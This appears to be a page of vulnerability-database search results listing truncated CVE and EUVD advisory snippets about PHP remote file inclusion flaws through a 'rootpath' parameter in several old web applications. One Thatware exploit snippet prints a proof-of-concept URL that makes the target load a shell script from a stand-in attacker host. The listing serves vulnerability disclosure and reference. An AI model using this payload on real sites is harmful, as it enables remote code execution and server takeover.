EUVD-2007-5149

Malware in sbrugna...

EUVD-2007-2256

Malware in sbrugna...

Thatware <= 0.5.3 Multiple Remote File Include Exploit

Exploit for unknown platform in category web applications ====================================================== Thatware PoC : http://server/config.php?rootpath=http://attcker/shell.txt??? Vuln : ./thatwarepath/artlist.php line 28 PoC :...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in MeetWeb 0.8 allow remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter to 1 modules.php, 2 ManagerResource.class.php, 3 ManagerRightsResource.class.php, 4 RegForm.class.php, 5 RegResource.class.php, and 6...

CVE-2007-4906

PHP remote file inclusion vulnerability in tasks/sendqueuedemails.php in NuclearBB Alpha 2, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter...

CVE-2007-1976

PHP remote file inclusion vulnerability in index.php in the Virii Info 1.10 and earlier module for Xoops allows remote attackers to execute arbitrary PHP code via a URL in the xoopsConfigrootpath parameter. NOTE: the issue has been disputed by a reliable third party, stating that the application'...

CVE-2007-1458

Multiple PHP remote file inclusion vulnerabilities in CARE2X 1.1 allow remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter to 1 inccheckdatelang.php, 2 inccharsetfx.php, 3 incconfigcolor.php, 4 inccurrencyset.php, 5 incdbmakelink.php, 6 incdiagnosticsreportfx.php, 7...

CVE-2006-6686

PHP remote file inclusion vulnerability in sender.php in Carsen Klock TextSend 1.5 allows remote attackers to execute arbitrary PHP code via a URL in the ROOTPATH parameter...

CVE-2006-6686

PHP remote file inclusion vulnerability in sender.php in Carsen Klock TextSend 1.5 allows remote attackers to execute arbitrary PHP code via a URL in the ROOTPATH parameter...

EUVD-2006-3297

PHP remote file inclusion vulnerability in smsconfig/gateway.php in PhpMySms 2.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the ROOTPATH parameter...

Remote file inclusion

PHP remote file inclusion vulnerability in functions.php in Circle R Monster Top List MTL 1.4 allows remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter. NOTE: It was later reported that 1.4.2 and earlier are affected...

Invision Power Board ipchat.php root_path Parameter Remote File Inclusion

It is possible to make the remote host include PHP files hosted on a third-party server using Invision Power Board. The ipchat.php script fails to sanitize input passed to the 'rootpath' parameter. An attacker may use this flaw to inject arbitrary code in the remote host and gain a shell with the...

CVE-2002-2297

PHP remote file inclusion vulnerability in artlist.php in Thatware 0.5.2 and 0.5.3 allows remote attackers to execute arbitrary PHP code via the rootpath parameter...